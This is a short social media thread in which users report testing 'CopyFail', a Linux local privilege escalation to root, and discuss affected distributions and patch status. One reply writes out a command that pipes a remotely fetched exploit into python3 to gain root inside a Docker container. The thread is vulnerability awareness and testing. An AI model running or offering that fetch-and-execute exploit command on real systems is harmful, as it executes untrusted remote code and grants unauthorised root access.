Yeah I tested CopyFail.
-
Yeah I tested CopyFail. It's real. Yikes.
https://discourse.ifin.network/t/copy-fail-732-bytes-to-root-on-every-major-linux-distributions/342
-
Yeah I tested CopyFail. It's real. Yikes.
https://discourse.ifin.network/t/copy-fail-732-bytes-to-root-on-every-major-linux-distributions/342
@mttaggart Can't privesc me if I always run as root!
-
Yeah I tested CopyFail. It's real. Yikes.
https://discourse.ifin.network/t/copy-fail-732-bytes-to-root-on-every-major-linux-distributions/342
@mttaggart tested it in a docker image (used Noble as the LTS releases have patched kernels already):
```
host $ docker run --rm -it ubuntu:noble
container # apt update && apt install curl python3
container # su ubuntu
container $ curl https://copy.fail/exp | python3 && su
container #
```I'd say this is a welp of considerable magnitude
-
Yeah I tested CopyFail. It's real. Yikes.
https://discourse.ifin.network/t/copy-fail-732-bytes-to-root-on-every-major-linux-distributions/342
@mttaggart Debian 13 still vulnerable with 6.12.74
-
Yeah I tested CopyFail. It's real. Yikes.
https://discourse.ifin.network/t/copy-fail-732-bytes-to-root-on-every-major-linux-distributions/342
Editing to add:
RHEL has now updated the severity and the fix is no longer "deferred" for all affected OSes.
Looks like it requires a local user account, with a password set, to exploit, yes?
